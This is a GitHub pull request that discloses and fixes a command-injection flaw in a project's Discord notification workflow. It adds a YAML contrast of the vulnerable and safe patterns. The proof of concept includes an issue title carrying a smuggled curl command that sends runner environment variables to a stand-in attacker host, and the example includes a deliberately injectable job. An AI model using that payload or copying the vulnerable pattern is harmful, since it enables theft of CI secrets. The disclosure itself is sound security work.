Security fix: Refactor Discord notification workflow for issues and discussions#2732

Open
nekros1xx wants to merge 1 commit intopo-ui:masterfrom
nekros1xx:nekros1xx-patch-1

Conversation

@nekros1xx

Summary

The issue.yml workflow contains a GitHub Actions Expression Injection vulnerability (CWE-78: OS Command Injection) that allows arbitrary command execution on the GitHub Actions runner through crafted issue titles or discussion titles.

Vulnerability Details

Affected file: .github/workflows/issue.yml

The expressions ${{ github.event.issue.title }} and ${{ github.event.discussion.title }} are interpolated directly into the run: block before the shell interprets the script. If the issue/discussion title contains shell metacharacters, arbitrary commands execute on the runner.

Proof of Concept

An attacker creates an issue with the following title:

test$(curl https://attacker.example.com/$(printenv | base64))

After GitHub expression substitution, the shell executes:

TITLE="test$(curl https://attacker.example.com/$(printenv | base64))"

This exfiltrates all environment variables including DISCORD_WEBHOOK_URL_ISSUES to the attacker's server.

Fix Applied

All ${{ }} expressions referencing attacker-controllable data have been moved from the run: block to the env: block. When values are assigned to environment variables first, the shell treats them as data rather than code, preventing injection.

References
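
The vulnerable pattern and the env:-based fix described above, side by side as an added example; this is not the po-ui repository's actual .github/workflows/issue.yml, and the step names, the use of the `||` fallback between issue and discussion titles, and the jq-built payload are assumptions (the secret name DISCORD_WEBHOOK_URL_ISSUES is taken from the PR description).

```yaml
# Added illustration, not the project's own workflow. Both jobs are shown only
# for contrast; a real workflow would keep the "notify-safe" job alone.
on:
  issues:
    types: [opened]
  discussion:
    types: [created]

jobs:
  notify-unsafe:
    runs-on: ubuntu-latest
    steps:
      - name: Notify Discord (injectable)
        # The Actions runtime substitutes the expression into the script text
        # BEFORE bash parses it, so shell metacharacters in the title become code.
        run: |
          TITLE="${{ github.event.issue.title || github.event.discussion.title }}"
          curl -sS -H 'Content-Type: application/json' \
            -d "{\"content\": \"New: ${TITLE}\"}" \
            "${{ secrets.DISCORD_WEBHOOK_URL_ISSUES }}"

  notify-safe:
    runs-on: ubuntu-latest
    steps:
      - name: Notify Discord (title passed as data)
        env:
          # Expressions are expanded here, by the runner, into environment
          # variables; the shell only ever reads "$TITLE" as a string value.
          TITLE: ${{ github.event.issue.title || github.event.discussion.title }}
          WEBHOOK: ${{ secrets.DISCORD_WEBHOOK_URL_ISSUES }}
        run: |
          # Let jq build the JSON so quotes or backslashes in the title cannot
          # break the payload either (env: alone only fixes the shell layer).
          payload=$(jq -n --arg t "New: $TITLE" '{content: $t}')
          curl -sS -H 'Content-Type: application/json' -d "$payload" "$WEBHOOK"
```

A quick audit for the same class of bug in other workflows is to search for `${{` occurring inside any `run:` block, since an expression that never reaches the script text cannot be parsed as shell.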

@nekros1xx
Author

This PR addresses a security vulnerability.
Could you please create a security advisory for this issue so a CVE ID can be assigned?
I'm happy to help with the advisory details.
